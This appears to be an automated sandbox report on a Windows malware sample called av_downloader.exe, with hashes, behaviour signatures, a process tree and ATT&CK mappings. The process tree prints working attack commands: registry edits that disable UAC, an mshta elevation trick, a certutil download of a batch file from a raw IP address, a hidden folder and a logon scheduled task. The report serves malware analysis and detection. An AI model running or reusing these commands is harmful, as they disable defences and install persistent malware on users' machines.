Analysis
-
max time kernel
149s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system -
submitted
20-04-2024 11:56
Static task
static1
Behavioral task
behavioral1
Sample
av_downloader.exe
Resource
win7-20240220-en
General
-
Target
av_downloader.exe
-
Size
90KB
-
MD5
8af4f985862c71682e796dcc912f27dc
-
SHA1
7f83117abfeff070d41d8144cf1dfe3af8607d27
-
SHA256
d925204430ffab51ffbbb9dc90bc224b04f0c2196769850695512245a886be06
-
SHA512
3d4fcd9755dc4ea005fcd46e78426c5f71b50873c5174a69abcdff41a2e0405c87a36137c0c2409abedadb0ecdf622cbfd2fa1b59a2e06c81cef68d7c6c663b7
-
SSDEEP
1536:v7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfnweJbOC:D7DhdC6kzWypvaQ0FxyNTBfnBV
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" reg.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 1952 attrib.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation mshta.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\e: cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2124 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2608 timeout.exe -
Suspicious use of WriteProcessMemory 25 IoCs
description pid Process procid_target PID 3396 wrote to memory of 3444 3396 av_downloader.exe 85 PID 3396 wrote to memory of 3444 3396 av_downloader.exe 85 PID 3444 wrote to memory of 4856 3444 cmd.exe 86 PID 3444 wrote to memory of 4856 3444 cmd.exe 86 PID 4856 wrote to memory of 2304 4856 mshta.exe 88 PID 4856 wrote to memory of 2304 4856 mshta.exe 88 PID 4856 wrote to memory of 2304 4856 mshta.exe 88 PID 2304 wrote to memory of 3220 2304 AV_DOW~1.EXE 91 PID 2304 wrote to memory of 3220 2304 AV_DOW~1.EXE 91 PID 3220 wrote to memory of 3832 3220 cmd.exe 92 PID 3220 wrote to memory of 3832 3220 cmd.exe 92 PID 3220 wrote to memory of 836 3220 cmd.exe 93 PID 3220 wrote to memory of 836 3220 cmd.exe 93 PID 3220 wrote to memory of 3964 3220 cmd.exe 94 PID 3220 wrote to memory of 3964 3220 cmd.exe 94 PID 3220 wrote to memory of 1952 3220 cmd.exe 95 PID 3220 wrote to memory of 1952 3220 cmd.exe 95 PID 3220 wrote to memory of 1720 3220 cmd.exe 97 PID 3220 wrote to memory of 1720 3220 cmd.exe 97 PID 3220 wrote to memory of 3704 3220 cmd.exe 99 PID 3220 wrote to memory of 3704 3220 cmd.exe 99 PID 3220 wrote to memory of 2124 3220 cmd.exe 100 PID 3220 wrote to memory of 2124 3220 cmd.exe 100 PID 3220 wrote to memory of 2608 3220 cmd.exe 101 PID 3220 wrote to memory of 2608 3220 cmd.exe 101 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1952 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\av_downloader.exe"C:\Users\Admin\AppData\Local\Temp\av_downloader.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3396 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\608F.tmp\6090.tmp\6091.bat C:\Users\Admin\AppData\Local\Temp\av_downloader.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:3444 -
C:\Windows\system32\mshta.exemshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4856 -
C:\Users\Admin\AppData\Local\Temp\AV_DOW~1.EXE"C:\Users\Admin\AppData\Local\Temp\AV_DOW~1.EXE" goto :target4⤵
- Suspicious use of WriteProcessMemory
PID:2304 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\62A2.tmp\62A3.tmp\62A4.bat C:\Users\Admin\AppData\Local\Temp\AV_DOW~1.EXE goto :target"5⤵
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:3220 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F6⤵
- UAC bypass
PID:3832
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F6⤵
- UAC bypass
PID:836
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F6⤵
- UAC bypass
PID:3964
-
-
C:\Windows\system32\attrib.exeattrib +s +h e:\net6⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1952
-
-
C:\Windows\system32\certutil.execertutil -urlcache -split -f http://206.217.142.166:1234/windows/dr/dr.bat e:\net\dr\dr.bat6⤵PID:1720
-
-
C:\Windows\system32\certutil.execertutil -urlcache * delete6⤵PID:3704
-
-
C:\Windows\system32\schtasks.exeSchTasks /Create /SC ONLOGON /TN "my dr" /TR "e:\net\dr\dr.bat" /f6⤵
- Creates scheduled task(s)
PID:2124
-
-
C:\Windows\system32\timeout.exeTIMEOUT /T 1006⤵
- Delays execution with timeout.exe
PID:2608
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
1Disable or Modify Tools
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5ce802b6e8add0c59b4c1ceea614bafa3
SHA106bfafde5c85d2ea230ebccf8db6f0d9e39520a1
SHA256419010826148482cca4ad662fdbdc8eac445b4b6181e4a1f4b62d7eb7783f4e2
SHA5128acd430a20f444bd2fc45b059805cb608d19e95edd60576340dcbce99072e6e58be43fc0bd61c031698279c964f748ffebf01ef94a7c7e90f02b2b0f041fe6e8
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D91B1967EF3D6973EA9AE658EC3C1C5D
Filesize248B
MD5ed13113f252798a9991a5a50c79f9f9e
SHA10253042661dc7530de24a53e91824d3b9a2f87ea
SHA2569d67bdbec09f774e34a652e73ccbd7701c791699fe34b4e15e115aa1305456da
SHA5125116e943af13b64dc8ec660b5a4403d7eec7b7b61b8f2e97c8321741df1ef14c248a19de6342e9af387ec0f5605ea5490a410f8ef82c5188469f7a7454d897bc
-
Filesize
965B
MD5db5421114f689cfb1c82edf49fddd7a4
SHA1a1987cfe0b38bdac3fe75bae72137463a0843fac
SHA256edb8e629e2c5ae4498d0f00cb4540f185cf6136ba11898a542d2fdd34394379a
SHA5126eaf5f71787046951ffc1fe98c3fdae7dd5a36214cf4971146a94d200bbf2037a8f87e1afa81e05b2d34083d298b0254ac23d2b2e518b6e75fab38e5ca376281